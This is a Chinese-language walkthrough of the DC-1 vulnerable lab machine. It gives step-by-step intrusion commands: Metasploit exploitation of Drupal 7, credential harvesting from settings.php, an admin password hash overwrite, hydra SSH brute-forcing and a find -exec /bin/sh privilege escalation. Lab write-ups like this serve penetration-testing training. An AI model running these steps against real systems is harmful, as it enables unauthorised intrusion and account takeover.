DC-1

DC系列是专门构建的易受攻击的实验室，旨在获得渗透测试领域的经验，目前总共有9个靶机
关注微信公众号：网络安全101，公众号内回复**DC**，即可获取DC系列靶机镜像！

导入DC1靶机，网络适配器选择NAT模式，确保和kali处于同一IP段！！！

1、使用nmap对当前网段进行扫描

nmap 192.168.84.0/24

![image-20220918215054264](https://oss.maolin101.com/20250107034255897.png-101.webp)

得知192.168.84.141开放了80端口

2、通过浏览器对80端口进行访问，得知是由cms搭建的网站

![image-20220918215222390](https://oss.maolin101.com/20250107034255898.png-101.webp)

通过Wappalyzer插件，得知是由Drupal 7 搭建

Drupal 7 存在CMS框架漏洞吗？？use

3、通过msf漏洞利用框架工具，搜索Drupal 7 存在的现有漏洞

search Drupal 7

![image-20220918220234248](https://oss.maolin101.com/20250107034255899.png-101.webp)

可通过info 加上#号下面的id，查看具体漏洞信息

![image-20220918220421209](https://oss.maolin101.com/20250107034255900.png-101.webp)

4、如果认为哪个可以使用，则命令为use 标号

![image-20220918220512027](https://oss.maolin101.com/20250107034255901.png-101.webp)

5、使用show options 查看详细信息

![image-20220918220550572](https://oss.maolin101.com/20250107034255902.png-101.webp)

6、通过set 设置目标IP地址

set rhosts IP地址

![image-20220918221019663](https://oss.maolin101.com/20250107034255903.png-101.webp)

设置目标IP地址后，输入run，尝试是否可以拿到shell

![image-20220918221152244](https://oss.maolin101.com/20250107034255904.png-101.webp)

我们已经拿到shell

7、输入sysinfo来获取系统相关信息

![image-20220918221257910](https://oss.maolin101.com/20250107034255905.png-101.webp)

8、输入pwd，查看当前所在路径‘

![image-20220918221423439](https://oss.maolin101.com/20250107034255906.png-101.webp)

9、ls，查看当前路径下的文件

![image-20220918221524519](https://oss.maolin101.com/20250107034255907.png-101.webp)

10、cat，查看flag1.txt文件

![image-20220918221627188](https://oss.maolin101.com/20250107034255908.png-101.webp)

11、接着寻找配置文件

在sites/default/settings.php文件，存在flag2

![image-20220918222152633](https://oss.maolin101.com/20250107034255909.png-101.webp)

获取数据库的账号密码

db=drupaldb，username=dbuser，password=“R0ck3t”

12、使用shell

python -c 'import pty;pty.spawn("/bin/bash")'

弹一个交互式shell

![image-20220918225648979](https://oss.maolin101.com/20250107034255910.png-101.webp)

13、使用获取到的数据库账号密码进行登录

mysql -u dbuser -pR0ck3t

![image-20220918225859249](https://oss.maolin101.com/20250107034255911.png-101.webp)

14、在users表中，passwd存在hash算法加密

![image-20220918225922100](https://oss.maolin101.com/20250107034255912.png-101.webp)

在官网查询到哈希密码的加密文件
https://www.drupal.org/node/1023428

![image-20220918223931950](https://oss.maolin101.com/20250107034255913.png-101.webp)

可以使用这个文件对需要的密码进行加密

在/var/www/scripts路径中，有一个password-hash.sh文件

![image-20220918230602020](https://oss.maolin101.com/20250107034255914.png-101.webp)

跳转到www目录下，更新密码为admin

php scripts/password-hash.sh admin

![image-20220918230636667](https://oss.maolin101.com/20250107034255915.png-101.webp)

然后对原存在的密码进行更新操作

update users set pass='$S$DfBIXCmF.dJ5Ky2bWAMukxpsipRCGvQmXC.jnlUMbGIbySLzw7a0' where name='admin';

![image-20220918230909778](https://oss.maolin101.com/20250107034255916.png-101.webp)

15、使用账号密码 admin admin登录网站，在content功能点中发现flag3

![image-20220918230956838](https://oss.maolin101.com/20250107034255917.png-101.webp)

16、cd /home 目录下有个flag4文件who

![image-20220918224513007](https://oss.maolin101.com/20250107034255918.png-101.webp)

17、通过 cat /etc/passwd 发现存在flag4用户

![image-20220918224611700](https://oss.maolin101.com/20250107034255919.png-101.webp)

18、使用hydra爆破工具，对flag4用户爆破

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.84.141cd

![image-20220918224930124](https://oss.maolin101.com/20250107034255920.png-101.webp)

使用ssh 进行登录

ssh flag4@192.168.84.141

![image-20220918225351580](https://oss.maolin101.com/20250107034255921.png-101.webp)

19、对flag4进行提权，以find为例子

fand

- -name 按文件名查找
- -exec 对匹配对象执行的命令，以;结束
  但(;)是特殊字符需要转义（\）。

find -name 文件名 -exec /bin/sh \;

find ./ 文件名 -exec '/bin/sh' \;

![image-20220918231552503](https://oss.maolin101.com/20250107034255922.png-101.webp)

切换到root家目录，有个thefinalflag.txt

![image-20220918231930375](https://oss.maolin101.com/20250107034255923.png-101.webp)